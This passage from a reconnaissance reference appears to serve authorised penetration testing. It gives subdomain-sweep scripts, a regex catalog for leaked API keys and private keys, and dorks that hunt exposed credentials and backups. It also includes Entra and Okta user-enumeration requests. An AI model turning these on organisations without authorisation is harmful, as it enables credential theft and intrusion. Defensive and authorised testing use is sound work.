Empirically: passive cert-transparency enumeration (crt.sh / VirusTotal / Subfinder) misses 20–40% of high-value subdomains because (a) many internal hosts use wildcard certs that don't expose the FQDN, (b) some hosts have never been issued public certs (HTTP-only or self-signed), (c) very-recently-provisioned hosts haven't propagated to CT log mirrors yet.

Always pair passive enum with an active prefix-probe. Detectability: low (single A-record query per host; no port scan, no HTTP).

The high-yield prefix list (ordered by hit-rate from real engagements):

www, mail, webmail, smtp, imap, pop, owa, autodiscover, ftp, sftp,
vpn, sslvpn, gateway, gp, globalprotect, citrix, fortinet, anyconnect,
api, app, apps, mobile, m,
portal, login, sso, idp, iam, identity, accounts, oauth, auth, adfs,
admin, manage, console, dashboard, cp, cpanel,
intranet, internal, hr, payroll, finance, sap, erp, crm, helpdesk, servicedesk,
support, help, kb, status, monitoring, grafana, kibana, prometheus,
docs, wiki, confluence, jira, bitbucket, gitlab, jenkins, sonar, nexus,
git, svn, repo, code,
dev, test, staging, stg, qa, uat, sandbox, preprod, preview, demo,
careers, jobs, vacancies, recruit, eapps,
shop, store, ecommerce, checkout, payments, pay, billing,
old, legacy, archive, backup, beta, v1, v2, classic,
cdn, static, assets, media, img, files, downloads, public,
ns, ns1, ns2, dns, mx, mx1, mx2,
zoom, teams, slack, lync, sip, voice, meet,
sclepro, tender, tenders, suppliers, vendor, vendors, procurement, purchase

One-liner (PowerShell):

$D = "target.example"
$prefixes = @("www","mail","webmail","owa","autodiscover","ftp","vpn","sslvpn","gateway","api","app","portal","login","sso","idp","iam","identity","accounts","oauth","auth","adfs","admin","intranet","hr","sap","erp","crm","support","help","status","grafana","kibana","docs","wiki","jira","jenkins","gitlab","dev","test","staging","stg","qa","uat","sandbox","preprod","preview","careers","jobs","eapps","old","legacy","beta","tender","suppliers","procurement")
foreach ($p in $prefixes) {
  $r = Resolve-DnsName "$p.$D" -Type A -ErrorAction SilentlyContinue
  if ($r) {
    $ips = ($r | ? {$_.IPAddress}).IPAddress -join ","
    "$p.$D -> $ips"
  }
}

One-liner (bash + dig):

D="target.example"
for p in www mail webmail owa autodiscover ftp vpn sslvpn gateway api app portal login sso idp iam identity accounts oauth auth adfs admin intranet hr sap erp crm support help status grafana kibana docs wiki jira jenkins gitlab dev test staging stg qa uat sandbox preprod preview careers jobs eapps old legacy beta tender suppliers procurement; do
  IP=$(dig +short A "$p.$D" | grep -E '^[0-9.]+$' | head -1)   # skip CNAME lines, keep the first A record
  [ -n "$IP" ] && echo "$p.$D -> $IP"
done

Mass DNS approach (faster for large prefix lists):

# Generate candidate FQDNs from a wordlist; resolve in parallel via puredns
puredns resolve <(awk -v d="$D" '{print $1"."d}' assetnote-best-dns-wordlist.txt) -r resolvers.txt
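
For hosts where neither PowerShell nor dig is available, the same sweep can be sketched with the Python standard library. This is a sketch under assumptions: it uses the system resolver via `socket.getaddrinfo`, the function names are hypothetical, and the wildcard check (resolving one random label first) is an addition that the text above does not describe.

```python
import secrets
import socket
from typing import Callable, Iterable

def resolve_a(fqdn: str) -> list[str]:
    """Return IPv4 addresses for fqdn via the system resolver, or [] on failure."""
    try:
        infos = socket.getaddrinfo(fqdn, None, family=socket.AF_INET,
                                   type=socket.SOCK_STREAM)
    except (socket.gaierror, UnicodeError):
        return []
    return sorted({info[4][0] for info in infos})

def prefix_sweep(domain: str, prefixes: Iterable[str],
                 resolver: Callable[[str], list[str]] = resolve_a) -> dict[str, list[str]]:
    """Resolve <prefix>.<domain> for each prefix and return only the hits."""
    # Assumption: if a random label resolves, the zone has a wildcard record,
    # so addresses equal to the wildcard answer are not treated as real hits.
    wildcard = set(resolver(f"{secrets.token_hex(8)}.{domain}"))
    hits: dict[str, list[str]] = {}
    for prefix in prefixes:
        fqdn = f"{prefix}.{domain}"
        ips = [ip for ip in resolver(fqdn) if ip not in wildcard]
        if ips:
            hits[fqdn] = ips
    return hits
```

The resolver is injectable so the logic can be exercised offline, for example `prefix_sweep("target.example", ["vpn", "api"], resolver=my_fake)`.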

What to extract from each hit:

  • IP / IP block → ASN lookup (§28.1) → confirms target-owned vs hosted-elsewhere.
  • For vpn.* / gateway.* / gp.* / globalprotect.* / citrix.* → flag for active vendor fingerprint (§16.16) under separate engagement scope.
  • For api.* / app.* → seed for §16.1–16.10 webapp probes.
  • For staging.* / dev.* / uat.* → seed for §16.5 always-on HTTP checks (often weaker auth + debug endpoints).
  • For intranet.* / eapps.* / sclepro.* → public-intranet finding (often MEDIUM; per §40).

Real-engagement validation: in an internal smoke test, prefix-sweep found vpn., api., intranet., staging., support., eapps., sclepro., autodiscover. — all of which crt.sh missed (or returned 502 for). Treat passive + active as complementary, not alternatives.


17. Secret-Pattern Catalog — 48 patterns (29 base + 19 modern)

The catalog runs against any text source: GitHub code, Postman workspaces, JS bodies, sourcesContent blobs, mobile-app strings, Wayback HTML, paste sites, Stack Exchange code blocks. Order matters: most-specific patterns first so generic catches don't pre-empt typed ones.

# Name Regex Severity Category
1 AWS Access Key \b(AKIA|ASIA)[0-9A-Z]{16}\b CRITICAL aws
2 AWS Secret Key (typed) (?i)aws[_\-]?secret[_\-]?access[_\-]?key['"\s:=]+([A-Za-z0-9/+=]{40}) CRITICAL aws
3 AWS Secret (loose) (?i)aws(.{0,20})?(secret|sk)["'=: ]+([0-9a-z/+=]{40}) HIGH aws
4 GCP Service Account JSON "type"\s*:\s*"service_account" CRITICAL gcp
5 Google API Key \bAIza[0-9A-Za-z_\-]{35}\b HIGH gcp
6 GitHub Classic PAT \bghp_[A-Za-z0-9]{36}\b CRITICAL github
7 GitHub Fine-grained PAT \bgithub_pat_[A-Za-z0-9_]{82}\b CRITICAL github
8 GitHub OAuth \bgho_[A-Za-z0-9]{36}\b HIGH github
9 GitHub App / Refresh Token (ghu_ user-to-server, ghs_ server-to-server, ghr_ refresh) \bgh[usr]_[A-Za-z0-9]{36,}\b HIGH github
10 Stripe Live Key \bsk_live_[0-9A-Za-z]{24,}\b CRITICAL stripe
11 Stripe Test Key \bsk_test_[0-9A-Za-z]{24,}\b LOW stripe
12 Slack Token \bxox[abpors]-[0-9A-Za-z\-]{10,48}\b HIGH slack
13 Slack Webhook https://hooks\.slack\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+ MEDIUM slack
14 SendGrid Key \bSG\.[A-Za-z0-9_\-]{22}\.[A-Za-z0-9_\-]{43}\b HIGH email_svc
15 Mailgun Key (v1) \bkey-[0-9a-zA-Z]{32}\b HIGH email_svc
16 Mailgun Key (loose) \bkey-[0-9a-f]{32}\b HIGH email_svc
17 Twilio API Key \bSK[0-9a-fA-F]{32}\b HIGH twilio
18 Twilio Account SID \bAC[a-f0-9]{32}\b MEDIUM twilio
19 Twilio Auth Token (?i)twilio(.{0,20})?(auth|token)["'=: ]+([a-f0-9]{32}) HIGH twilio
20 Heroku API Key (?i)heroku(.{0,20})?api["'=: ]+([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}) MEDIUM paas
21 Firebase URL \bhttps?://[a-z0-9\-]+\.firebaseio\.com\b LOW firebase
22 JWT (any) \beyJ[A-Za-z0-9_\-]{10,}\.eyJ[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}\b MEDIUM jwt
23 Bearer Token Assignment (?i)authorization["'=: ]+bearer\s+[A-Za-z0-9._\-]{20,} MEDIUM bearer
24 Basic Auth in URL https?://[^/\s:@]+:[^/\s:@]+@[^/\s]+ MEDIUM basic_auth
25 RSA Private Key -----BEGIN RSA PRIVATE KEY----- CRITICAL private_key
26 EC Private Key -----BEGIN EC PRIVATE KEY----- CRITICAL private_key
27 OpenSSH Private Key -----BEGIN OPENSSH PRIVATE KEY----- CRITICAL private_key
28 Generic Private Key -----BEGIN (DSA |PGP |)PRIVATE KEY----- CRITICAL private_key
29 Generic API Key (?i)(?:api[_\-]?key|apikey|api_secret|access_token|secret[_\-]?token)['"\s:=]+["']([A-Za-z0-9+/=_\-]{24,})["'] MEDIUM generic
30 Anthropic API Key \bsk-ant-(?:api03|admin01)-[A-Za-z0-9_\-]{93,}\b CRITICAL ai_api
31 OpenAI API Key (legacy) \bsk-[A-Za-z0-9]{20}T3BlbkFJ[A-Za-z0-9]{20}\b CRITICAL ai_api
32 OpenAI Project Key \bsk-proj-[A-Za-z0-9_\-]{40,}T3BlbkFJ[A-Za-z0-9_\-]{40,}\b CRITICAL ai_api
33 OpenAI User Session \bsess-[A-Za-z0-9]{40}\b HIGH ai_api
34 HuggingFace Token \bhf_[A-Za-z0-9]{30,}\b HIGH ai_api
35 Cloudflare API Token \b[A-Za-z0-9_\-]{40}\b (when paired with (?i)cloudflare/X-Auth-Key context) HIGH infra_api
36 Cloudflare Global API Key (?i)cf[_\-]?api[_\-]?key['"\s:=]+([a-f0-9]{37}) CRITICAL infra_api
37 DigitalOcean Token \bdop_v1_[a-f0-9]{64}\b HIGH infra_api
38 npm Token (Modern) \bnpm_[A-Za-z0-9]{36}\b HIGH package_registry
39 PyPI Token \bpypi-AgENdGV[A-Za-z0-9_\-]+\b HIGH package_registry
40 Docker Hub PAT \bdckr_pat_[A-Za-z0-9_\-]{27,}\b HIGH package_registry
41 Atlassian API Token \bATATT3xFfGF0[A-Za-z0-9_\-]{180,}\b HIGH saas_api
42 New Relic License Key \b(?:NRAA|NRAK|NRBR)-[A-F0-9]{27}\b MEDIUM observability
43 DataDog API Key (in DD_API_KEY context) (?i)dd[_\-]?api[_\-]?key['"\s:=]+([a-f0-9]{32}) HIGH observability
44 Sentry DSN https://[a-f0-9]+@o[0-9]+\.ingest\.sentry\.io/[0-9]+ LOW observability
45 ngrok Auth Token \b[12][A-Za-z0-9]{26}_[A-Za-z0-9]{32,}\b (when (?i)ngrok context) MEDIUM tunneling
46 Linear API Key \blin_api_[A-Za-z0-9]{40}\b MEDIUM saas_api
47 Discord Bot Token \b[MN][A-Za-z\d]{23}\.[\w\-]{6}\.[\w\-]{27}\b HIGH bot_token
48 Telegram Bot Token \b\d{8,10}:[A-Za-z0-9_\-]{35}\b HIGH bot_token

False-positive notes:

  • Patterns 22 (JWT), 23 (Bearer), 29 (Generic) trigger on test/example data frequently. Always look at context — a JWT in a README.md example block ≠ a JWT in a production .env file.
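  • Pattern 11 (Stripe test) is noisy by design, which is why its severity is LOW. Pattern 16 (Mailgun loose) is also noisy but is rated HIGH in the table, and every pattern-16 hit also matches pattern 15 (hex is a subset of alphanumeric), so confirm Mailgun hits from context before reporting.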
  • Pattern 24 (Basic auth in URL) catches monitoring-tool URLs and CI-debug URLs as well as real creds — verify before alerting.
  • For GitHub's Fine-grained PAT (pattern 7), the 82 length is by GitHub's spec — be skeptical of matches significantly longer or shorter.
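
The "most-specific first" ordering can be sketched as a scanner that lets earlier patterns claim a span so later generic patterns cannot re-report it. This is an illustrative sketch using four rows copied from the catalog; the `scan` function, the overlap rule, and the `***` + last-4 evidence format are assumptions rather than the skill's actual implementation.

```python
import re

# (name, regex, severity, capture group that holds the secret); catalog order preserved.
CATALOG = [
    ("AWS Access Key", r"\b(AKIA|ASIA)[0-9A-Z]{16}\b", "CRITICAL", 0),
    ("GitHub Classic PAT", r"\bghp_[A-Za-z0-9]{36}\b", "CRITICAL", 0),
    ("JWT (any)", r"\beyJ[A-Za-z0-9_\-]{10,}\.eyJ[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}\b", "MEDIUM", 0),
    ("Generic API Key",
     r"""(?i)(?:api[_\-]?key|apikey|api_secret|access_token|secret[_\-]?token)['"\s:=]+["']([A-Za-z0-9+/=_\-]{24,})["']""",
     "MEDIUM", 1),
]
COMPILED = [(name, re.compile(rx), sev, grp) for name, rx, sev, grp in CATALOG]

def scan(text: str) -> list[dict]:
    """Run patterns in catalog order; a span claimed by an earlier pattern is skipped later."""
    claimed: list[tuple[int, int]] = []
    findings: list[dict] = []
    for name, rx, severity, group in COMPILED:
        for m in rx.finditer(text):
            start, end = m.span()
            if any(start < e and s < end for s, e in claimed):
                continue  # a more specific pattern already reported this region
            claimed.append((start, end))
            findings.append({
                "name": name,
                "severity": severity,
                "evidence": "***" + m.group(group)[-4:],  # keep last 4 chars only
                "offset": start,
            })
    return findings
```

With this rule, a GitHub PAT assigned to `api_key` is reported once as a typed CRITICAL finding instead of also appearing as a MEDIUM generic hit.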

18. Dork Corpus — 80+ templates, 9 categories

Substitute {domain} with the target domain (e.g., example.com) and {company} with the company name (e.g., Acme Corporation). Run via Google, Bing, Brave, DuckDuckGo, Yandex, Baidu — engines surface different results.

18.1 Files

site:{domain} filetype:env
site:{domain} ext:env OR ext:ini OR ext:cfg OR ext:conf
site:{domain} ext:sql OR ext:sqlite OR ext:dump OR ext:bak
site:{domain} ext:pem OR ext:key OR ext:p12 OR ext:pfx
site:{domain} ext:log
site:{domain} intitle:"index of"
site:{domain} inurl:.git OR inurl:/.git/
site:{domain} inurl:backup OR inurl:.bak OR inurl:old
site:{domain} ext:yml OR ext:yaml
site:{domain} ext:properties

18.2 Admin / login panels

site:{domain} inurl:admin OR inurl:login OR inurl:sso OR inurl:dashboard
site:{domain} intitle:"phpMyAdmin"
site:{domain} intitle:"Jenkins"
site:{domain} intitle:"Grafana"
site:{domain} intitle:"Kibana"
site:{domain} intitle:"Splunk"
site:{domain} (intitle:"login" OR intitle:"sign in")
site:{domain} intitle:"GitLab"
site:{domain} intitle:"Swagger" OR intitle:"OpenAPI"
site:{domain} inurl:phpinfo

18.3 Secrets / credential leakage

"{domain}" ("api_key" OR "apikey" OR "access_token")
"{domain}" (password OR passwd OR pwd)
site:pastebin.com "{domain}"
site:ghostbin.com "{domain}"
site:rentry.co "{domain}"
site:gist.github.com "{domain}"
site:hastebin.com "{domain}"
"{domain}" "BEGIN RSA PRIVATE KEY"

18.4 Cloud / CI / shadow-IT

site:s3.amazonaws.com "{domain}"
site:storage.googleapis.com "{domain}"
site:blob.core.windows.net "{domain}"
site:digitaloceanspaces.com "{domain}"
site:trello.com "{domain}"
site:*.atlassian.net "{domain}"
site:dev.azure.com "{domain}"
site:bitbucket.org "{domain}"
site:firebaseio.com "{domain}"
site:herokuapp.com "{domain}"

18.5 Docs / intel mining

site:{domain} filetype:pdf (confidential OR internal OR restricted)
site:{domain} filetype:xlsx OR filetype:csv
site:{domain} filetype:docx
site:scribd.com "{company}"
"{company}" filetype:pdf (salary OR payroll OR org-chart OR "organization chart")
site:linkedin.com/in "{company}"
site:slideshare.net "{company}"

18.6 Vuln indicators

site:{domain} intext:"sql syntax" OR intext:"you have an error in your sql"
site:{domain} intext:"Warning: mysql_"
site:{domain} intext:"Fatal error:" intext:"on line"
site:{domain} intext:"stack trace" OR intext:"Traceback (most recent call last)"
"Apache/2.4.49" site:{domain}
"Server: nginx/1.14" site:{domain}
site:{domain} inurl:wp-content OR inurl:wp-includes

18.7 Internal tool exposure

site:{domain} intitle:"Splunk"
site:{domain} intitle:"Grafana"
site:{domain} intitle:"Kibana"
site:{domain} intitle:"Prometheus Time Series"
site:{domain} intitle:"Jaeger UI"
site:{domain} intitle:"AlertManager"
site:{domain} intitle:"Argo CD"
site:{domain} intitle:"Sonarqube"
site:{domain} intitle:"Sentry"
site:{domain} intitle:"Confluence"
site:{domain} intitle:"Jira"
site:{domain} intitle:"GitLab"
site:{domain} intitle:"Gitea"
site:{domain} intitle:"Drone CI"
site:{domain} inurl:"/jenkins/"

18.8 Backup / dump file extensions

site:{domain} ext:bak OR ext:backup OR ext:old OR ext:orig OR ext:save OR ext:swp
site:{domain} ext:tar OR ext:tar.gz OR ext:tgz OR ext:zip OR ext:rar OR ext:7z
site:{domain} ext:db OR ext:sqlite OR ext:sqlite3 OR ext:mdb
site:{domain} ext:dump OR ext:rdb OR ext:bson
site:{domain} (intext:"-- MySQL dump" OR intext:"PostgreSQL database dump")
site:{domain} ext:pcap OR ext:pcapng OR ext:cap
site:{domain} ext:core OR ext:hprof OR ext:dmp

18.9 Sector-specific (healthcare / finance / gov)

# Healthcare
site:{domain} (filetype:pdf OR filetype:xlsx) (HIPAA OR PHI OR "patient records")
site:{domain} ("DICOM" OR "HL7" OR "ICD-10")

# Finance
site:{domain} (filetype:pdf OR filetype:xlsx) (SOC OR "audit report" OR "internal control")
site:{domain} (filetype:pdf OR filetype:xlsx) ("Form 10-K" OR "Form 10-Q" OR earnings)
site:{domain} ("SWIFT" OR "BIC" OR IBAN OR "wire transfer")

# Gov / public sector
site:{domain} (filetype:pdf OR filetype:doc) (FOUO OR "controlled unclassified" OR CUI)
site:{domain} (filetype:pdf OR filetype:xlsx) ("personnel security" OR clearance)

18.10 Result classification

After running, score each result via URL signature → title hint → snippet regex:

  • CRITICAL URL signatures: .pem, .p12, .pfx, .key extensions; id_rsa filename.
  • HIGH URL signatures: /.env, /.git/, database dumps, wp-config.bak, /phpmyadmin, /jenkins, /phpinfo.php.
  • MEDIUM URL signatures: /admin, /login, /swagger, .log, /backup, .DS_Store.
  • Snippet content (e.g., a secret regex hit in the snippet) overrides URL signature only if higher severity.
  • Confidence: snippet-only match = TENTATIVE (operator must visit URL to confirm; tag detectability=medium).

19. GitHub Code-Search Dorks for Targets — 13 dorks

Apply each template to {target} (root domain stem like acme), {domain} (full root domain like acme.com), and optionally {company} (Acme Corporation):

"{target}" filename:.env
"{target}" filename:.env.example
"{target}" filename:config
"{target}" AWS_ACCESS_KEY_ID
"{target}" AWS_SECRET_ACCESS_KEY
"{target}" password
"{target}" api_key
"{target}" secret
"{target}" authorization: Bearer
"{target}" filename:id_rsa
"{target}" filename:.git-credentials
"{target}" filename:wp-config.php
"@{domain}" password                        # emails + password context

Requirements: a GitHub personal access token (code search requires authentication; any scope works, and a fine-grained PAT with read-only repo access is recommended). Rate limits apply per token; cap concurrency at 5 requests.

For each result:

  1. Fetch the file (or relevant fragment) via the GitHub Contents API.
  2. Run the secret catalog (§17).
  3. If a secret hits → SECRET_LEAK finding with catalog severity, evidence = repo URL + file path + matched secret (truncated, last 4 chars only).
  4. Optional: clone the repo to a tempdir, run trufflehog/gitleaks for full history scan.
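
A small sketch of expanding the 13 templates and turning each into a GitHub REST code-search URL (`/search/code`). The function names are hypothetical; sending the request, authentication, and rate-limit handling are left out.

```python
from urllib.parse import quote

TEMPLATES = [
    '"{target}" filename:.env',
    '"{target}" filename:.env.example',
    '"{target}" filename:config',
    '"{target}" AWS_ACCESS_KEY_ID',
    '"{target}" AWS_SECRET_ACCESS_KEY',
    '"{target}" password',
    '"{target}" api_key',
    '"{target}" secret',
    '"{target}" authorization: Bearer',
    '"{target}" filename:id_rsa',
    '"{target}" filename:.git-credentials',
    '"{target}" filename:wp-config.php',
    '"@{domain}" password',
]

def build_queries(target: str, domain: str) -> list[str]:
    """Fill {target} and {domain} into every template."""
    return [t.format(target=target, domain=domain) for t in TEMPLATES]

def search_url(query: str, per_page: int = 30) -> str:
    """URL for GitHub's REST code-search endpoint with the query percent-encoded."""
    return f"https://api.github.com/search/code?q={quote(query)}&per_page={per_page}"
```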

20. Endpoint Interest Score — 0–100 rubric

For every classified endpoint (§22 in methodology skill), apply this rubric:

| Signal | Points | Conditions |
|---|---|---|
| Unauth write | +40 | POST/PUT/DELETE/PATCH endpoint returns 200/201/202/204 anonymously. |
| Open GraphQL introspection | +35 | __schema query returns full type list anonymously. |
| Verb tampering bypass | +30 | OPTIONS reveals method not documented; that method is accessible. |
| Reflected CORS + credentials | +25 | Access-Control-Allow-Origin reflects request Origin AND Access-Control-Allow-Credentials: true. |
| Sensitive keyword in path | +20 | Path matches one of: admin, internal, debug, user, password, token, key, export, upload, backup, config, secret, private, delete, purge, wipe. |
| Schema leak in error | +20 | Response body contains stack trace, ORM error class, framework signature (e.g., ActiveRecord::RecordNotFound, org.hibernate.exception.*, django.db.utils.IntegrityError). |
| API key in URL | +15 | Path or query string contains api_key=, apikey=, token=, access_token=. |
| Wildcard CORS | +10 | Access-Control-Allow-Origin: *. |
| Missing rate-limit headers | +10 | No RateLimit-* / X-RateLimit-* headers; no Retry-After after rapid requests. |

Thresholds:

| Score | Severity |
|---|---|
| ≥ 90 | CRITICAL |
| 70–89 | HIGH |
| 50–69 | MEDIUM |
| 25–49 | LOW |
| < 25 | INFO |

For score ≥ 70, attach an attack_path_hint in evidence (see §29).
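
A worked sketch of the rubric. The signal keys are hypothetical identifiers for the rows above, and capping the sum at 100 is an assumption: the listed points add up to 205 while the rubric is described as 0–100.

```python
POINTS = {
    "unauth_write": 40,
    "open_graphql_introspection": 35,
    "verb_tampering_bypass": 30,
    "reflected_cors_credentials": 25,
    "sensitive_path_keyword": 20,
    "schema_leak_in_error": 20,
    "api_key_in_url": 15,
    "wildcard_cors": 10,
    "missing_rate_limit_headers": 10,
}

def interest_score(signals) -> int:
    """Sum points for each distinct signal, capped at 100 (cap is an assumption)."""
    return min(100, sum(POINTS[s] for s in set(signals)))

def severity(score: int) -> str:
    """Map a score to the threshold bands listed above."""
    if score >= 90:
        return "CRITICAL"
    if score >= 70:
        return "HIGH"
    if score >= 50:
        return "MEDIUM"
    if score >= 25:
        return "LOW"
    return "INFO"
```

For example, an anonymous write endpoint that also allows verb tampering scores 40 + 30 = 70, which lands in HIGH and therefore needs an attack_path_hint.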


21. Mobile App Ownership Confidence — 0–100 rubric

Before running deep APK static analysis, score whether the discovered app actually belongs to the target. Threshold: ≥70 = accept.

| Signal | Points |
|---|---|
| Package reverse-DNS matches target domain (e.g., com.acme.android ↔ acme.com) | +40 |
| Developer email is <anything>@<target-domain> | +25 |
| Developer website URL is the target domain (or a confirmed sibling brand domain) | +20 |
| App name contains a brand keyword from operator-supplied brand list | +10 |
| App has at least the minimum review count (default: 20 reviews) | +5 |

Apps below threshold are tagged mobile_review_pending and shown but not analyzed. Operator can re-score with --mobile-ownership-threshold 50 for noisier collection.
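
The ownership rubric can be sketched as below. Function and parameter names are hypothetical; the website and brand-keyword signals are passed in as booleans because how they are confirmed is operator-specific.

```python
def package_matches_domain(package: str, domain: str) -> bool:
    """True when the package starts with the reversed domain labels (com.acme.* for acme.com)."""
    reversed_labels = list(reversed(domain.lower().split(".")))
    return package.lower().split(".")[:len(reversed_labels)] == reversed_labels

def ownership_score(package: str, target_domain: str, developer_email: str = "",
                    developer_site_is_target: bool = False,
                    name_has_brand_keyword: bool = False,
                    review_count: int = 0, min_reviews: int = 20) -> int:
    """Add up the rubric points for one discovered app."""
    score = 0
    if package_matches_domain(package, target_domain):
        score += 40
    if developer_email.lower().endswith("@" + target_domain.lower()):
        score += 25
    if developer_site_is_target:
        score += 20
    if name_has_brand_keyword:
        score += 10
    if review_count >= min_reviews:
        score += 5
    return score

def accept(score: int, threshold: int = 70) -> bool:
    """Apps below the threshold would be tagged mobile_review_pending."""
    return score >= threshold
```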


22. Identity Fabric — Concrete Endpoints

Methodology lives in the companion osint-methodology skill §11. This is the URL/payload reference.

22.1 Microsoft Entra (Azure AD)

OIDC metadata + tenant GUID extraction:

GET https://login.microsoftonline.com/{tenant-or-domain}/.well-known/openid-configuration

Response field issuer contains the tenant GUID. GUID regex:

\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b

Detectability: low.

getuserrealm.srf — managed vs federated probe:

GET https://login.microsoftonline.com/getuserrealm.srf?login=<probe-user>@<domain>

Response: JSON with NameSpaceType field (Managed / Federated / Unknown). Federated also includes FederationBrandName and AuthURL (the upstream IdP URL). Detectability: low.

Autodiscover v2:

POST https://autodiscover-s.outlook.com/autodiscover/metadata/json/1
Body: {"Email": "<probe-user>@<domain>"}

Returns the protocol endpoint for the user; presence indicates tenant membership. Detectability: low.

Autodiscover IP correlation (passive M365 confirmation):

Resolve autodiscover.<domain> and check if it lands in Microsoft Exchange Online IP space. This works even when MX is wrapped by Mimecast/Proofpoint/Barracuda inbound filtering, where MX alone doesn't reveal the underlying mail platform.

dig +short A autodiscover.target.example
Resolve-DnsName "autodiscover.$D" -Type A | Select Name,IPAddress

Microsoft Exchange Online IPs (truncated common ranges): 40.96.0.0/13, 52.96.0.0/14, 13.107.6.152/31, 13.107.18.10/31, 40.99.0.0/16, 40.104.0.0/15, 52.98.0.0/15. Full list: Office 365 URLs and IP address ranges.

If autodiscover.<domain> lands in that space → M365_CONFIRMED even when nothing else does. Detectability: low (passive DNS).
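
The range check can be sketched with the standard `ipaddress` module. The CIDR list is copied from the truncated list above, so it is not authoritative; refresh it from Microsoft's published ranges before relying on a negative result. The function name is hypothetical.

```python
import ipaddress

# Truncated common ranges from the text above, not the full published list.
EXO_RANGES = [ipaddress.ip_network(cidr) for cidr in (
    "40.96.0.0/13", "52.96.0.0/14", "13.107.6.152/31", "13.107.18.10/31",
    "40.99.0.0/16", "40.104.0.0/15", "52.98.0.0/15",
)]

def in_exchange_online(ip: str) -> bool:
    """True when ip falls inside one of the listed Exchange Online ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in EXO_RANGES)
```

Feed it each address returned for `autodiscover.<domain>`; a single match is enough for M365_CONFIRMED under the rule above.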

GetCredentialType — user-enum (deep mode only):

POST https://login.microsoftonline.com/common/GetCredentialType
Content-Type: application/json
Body:
{
  "username": "<email>",
  "isOtherIdpSupported": true,
  "checkPhones": false,
  "isRemoteNGCSupported": true,
  "isCookieBannerShown": false,
  "isFidoSupported": true,
  "originalRequest": "",
  "country": "US",
  "forceotclogin": false,
  "isExternalFederationDisallowed": false,
  "isRemoteConnectSupported": false,
  "federationFlags": 0
}

Response field IfExistsResult indicates user existence: 0 = exists, 1 = doesn't exist, 5 = exists in federated tenant. Detectability: medium (logged in tenant audit). Cap at 20 attempts per tenant.

22.2 Okta

Org slug derivation: start with stems from discovered subdomains and root-domain stem. Probe <slug>.okta.com and <slug>.oktapreview.com. Slug regex:

[a-z0-9][a-z0-9-]{1,40}\.okta(?:preview)?\.com

OIDC fingerprint:

GET https://<slug>.okta.com/.well-known/openid-configuration

/api/v1/authn user-enum (deep mode):

POST https://<slug>.okta.com/api/v1/authn
Content-Type: application/json
Body: {"username": "<email>", "password": "invalid_password_for_enum"}

Response distinguishes user existence:

  • 401 with errorCode: E0000004 → authentication failed. Okta returns this for unknown users and, in default configurations, for wrong passwords too, so on its own it does not prove the user is absent.
  • 200 with status: LOCKED_OUT / PASSWORD_WARN / MFA_REQUIRED → user exists.

Detectability: medium (audit-log per attempt). Cap at 20 attempts per tenant.

22.3 ADFS

Passive fingerprint:

GET https://{domain}/adfs/idpinitiatedsignon.aspx

A 200 OK with a urn:com:microsoft:ADFS: reference in HTML indicates ADFS. Version-string greppable in HTML resource references.

Mex endpoint (deep mode):

GET https://{domain}/adfs/Services/Trust/mex

Returns SOAP federation metadata including endpoint URLs, signing certs, and supported claim types.

22.4 Google Workspace

OIDC discovery:

GET https://{domain}/.well-known/openid-configuration

Google-Workspace-hosted-domain customers expose discovery endpoints with characteristic issuer URI (https://accounts.google.com) and JWKS URI. MX records pointing to aspmx.l.google.com are a corroborating signal.

22.5 Generic OIDC (Keycloak / Auth0 / Ping / OneLogin / Duo)

Discovery: probe /.well-known/openid-configuration on every alive subdomain. The issuer and authorization_endpoint field URLs fingerprint the product:

| Product | URL pattern in issuer |
|---|---|
| Auth0 | https://*.auth0.com |
| OneLogin | https://*.onelogin.com |
| Ping | https://*.pingone.com, https://*.pingidentity.com |
| Duo | https://*.duosecurity.com |
| Keycloak | URL contains /realms/<realm> |

22.6 SAML metadata

See §16.6.

22.7 AWS account-ID extraction

S3 bucket region header (passive):

HEAD https://<known-bucket>.s3.amazonaws.com/

Response includes x-amz-bucket-region. Cross-reference with bucket name entropy and known patterns to scope the account.

ARN regex (in any JSON / HTML / JS response):

arn:aws:[a-z0-9\-]+:[a-z0-9\-]*:([0-9]{12}):

Capture group: 12-digit AWS account ID.

AccountId property pattern:

(?i)["']?account[_\-]?id["']?\s*[:=]\s*["']([0-9]{12})["']

Google OAuth client_id:

\b\d{8,}-[a-z0-9]{10,40}\.apps\.googleusercontent\.com\b

MSAL / Microsoft client_id (GUID property):

(?i)["']?client[_\-]?id["']?\s*[:=]\s*["']([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})["']

OAuth scope extraction:

(?i)["']?scope["']?\s*[:=]\s*["']([^"']+)["']
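
A sketch that runs the extraction regexes from this subsection over one response body. The regexes are copied from above; the `extract_identifiers` name and the returned dictionary keys are assumptions.

```python
import re

GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
ARN_RE = re.compile(r"arn:aws:[a-z0-9\-]+:[a-z0-9\-]*:([0-9]{12}):")
ACCOUNT_ID_RE = re.compile(r"""(?i)["']?account[_\-]?id["']?\s*[:=]\s*["']([0-9]{12})["']""")
GOOGLE_CLIENT_RE = re.compile(r"\b\d{8,}-[a-z0-9]{10,40}\.apps\.googleusercontent\.com\b")
MS_CLIENT_RE = re.compile(r"""(?i)["']?client[_\-]?id["']?\s*[:=]\s*["'](""" + GUID + r""")["']""")
SCOPE_RE = re.compile(r"""(?i)["']?scope["']?\s*[:=]\s*["']([^"']+)["']""")

def extract_identifiers(text: str) -> dict[str, list[str]]:
    """Collect account IDs, OAuth client IDs, and scopes from any JSON / HTML / JS text."""
    account_ids = set(ARN_RE.findall(text)) | set(ACCOUNT_ID_RE.findall(text))
    scopes = {s for value in SCOPE_RE.findall(text) for s in value.split()}
    return {
        "aws_account_ids": sorted(account_ids),
        "google_client_ids": sorted(set(GOOGLE_CLIENT_RE.findall(text))),
        "ms_client_ids": sorted({g.lower() for g in MS_CLIENT_RE.findall(text)}),
        "scopes": sorted(scopes),
    }
```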

